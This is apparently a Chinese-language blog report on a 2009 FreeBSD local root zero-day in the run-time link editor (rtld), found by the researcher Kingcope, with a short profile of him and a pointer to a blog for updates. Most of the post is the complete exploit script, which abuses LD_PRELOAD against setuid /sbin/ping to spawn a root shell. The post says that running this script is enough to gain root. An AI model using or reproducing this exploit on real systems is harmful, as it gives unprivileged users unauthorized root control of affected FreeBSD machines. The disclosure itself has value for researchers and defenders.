在圣诞节即将到来的日子，以安全着称的FreeBSD系统被着名黑客Kingcope爆了一个零日（0day）漏洞。据Kingcope所说，他长期致力于挖掘FreeBSD系统的本地提权漏洞，终于有幸在近期发现了这个非常低级的本地提权漏洞；这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中，普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛，包括FreeBSD 7.1至8.0的32及64位系统。

　　在展示该漏洞威力之前，我们科普一下这名黑客kingcope。从2007年6月至今，他一共公开了12个安全漏洞（没公开的不知道有多少），其中 FreeBSD和Sun Solaris各两个，微软四个，Oracle、mysql、NcFTPD和nginx各一个，同时他还编写了多个漏洞的攻击代码，例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

　　接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程，请注意图中的红色部分；我们只要执行名为fbsd8localroot.sh的脚本，就可以轻易的获得root权限。

　　相关脚本如下：

　　#!/bin/sh

　　echo “FreeBSD local r00t zeroday by Kingcope on November 2009″

　　cat > env.c << _EOF

　　#include <stdio.h>

　　main() {

　　extern char **environ;

　　environ = (char**)malloc(8096);

　　environ[0] = (char*)malloc(1024);

　　environ[1] = (char*)malloc(1024);

　　strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

　　execl(”/sbin/ping”, “ping”, 0);

　　}

　　_EOF

　　gcc env.c -o env > /dev/null 2>&1

　　#download from baoz.net

　　cat > program.c << _EOF

　　#include <unistd.h>

　　#include <stdio.h>

　　#include <sys/types.h>

　　#include <stdlib.h>

　　void _init() {

　　extern char **environ;

　　environ=NULL;

　　system(”echo ALEX-ALEX;/bin/sh”);

　　}

　　_EOF

　　gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

　　FreeBSD尚未就该0day漏洞发布安全公告及官方补丁，敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。